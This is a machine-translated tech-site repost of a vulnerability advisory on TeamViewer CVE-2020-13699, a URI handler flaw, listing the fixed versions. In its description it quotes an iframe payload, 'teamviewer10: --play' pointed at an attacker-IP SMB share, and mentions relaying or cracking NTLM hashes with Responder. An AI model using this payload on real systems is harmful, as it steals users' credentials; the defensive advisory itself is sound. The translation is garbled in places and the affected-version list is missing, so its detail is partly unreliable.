Shulou(Shulou.com)05/31 Report--

TeamViewer remote code execution vulnerability CVE-2020-13699 notification is what, for this problem, this article describes the corresponding analysis and solution in detail, hoping to help more want to solve this problem of small partners to find a simpler way.

I. Summary of vulnerabilities

On August 6, 2020, TeamViewer officially issued a risk notice for TeamViewer URL processing. TeamViewer has a security flaw in unreferenced search paths or elements that could be exploited by hackers when a user with a vulnerable version of TeamViewer installed visits a maliciously created website because the application does not properly reference its custom URI handler. Deep Convincing Security Research team assesses vulnerability based on its importance and impact and makes vulnerability notifications.

Vulnerability Analysis 2.1 Introduction to TeamViewer

TeamViewer is an application developed by German company TeamViewer GmbH and available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 and BlackBerry operating systems.

It is primarily used for remote access and control of various types of computer systems and mobile devices, but also provides collaboration and presentation capabilities (e.g., desktop sharing, Web conferencing, file transfer, etc.).

2.2 vulnerability description

TeamViewer has a security flaw in unreferenced search paths or elements that could be exploited when a system with a vulnerable version of TeamViewer installed accesses a maliciously created website because the application does not properly reference its custom URI handler.

An attacker could embed a malicious iframe into a website using a crafted URL (iframe src ='teamviewer10: --play \\attacker-IP\share\fake.tvs'), launching the TeamViewer Windows desktop client and forcing it to open a remote SMB share.

Windows performs NTLM authentication when opening SMB shares and can forward the request (using tools such as Responder) to execute code (or capture the request for hash cracking).

Exploitation of this vulnerability can be initiated remotely and does not require prior authentication, making it ideal for puddle attacks.

III. Scope of impact

[Impact Version]

TeamViewer

Click the button Help-> Click the button About TeamViewer -> View TeamViewer version numbers.

To ensure that the version of TeamViewer is non-vulnerable.

4.2 repair scheme

This vulnerability has been officially fixed in versions 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.

About TeamViewer remote code execution vulnerability CVE-2020-13699 notice is what kind of problem answer is shared here, I hope the above content can have some help to everyone, if you still have a lot of doubts, you can pay attention to the industry information channel to learn more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.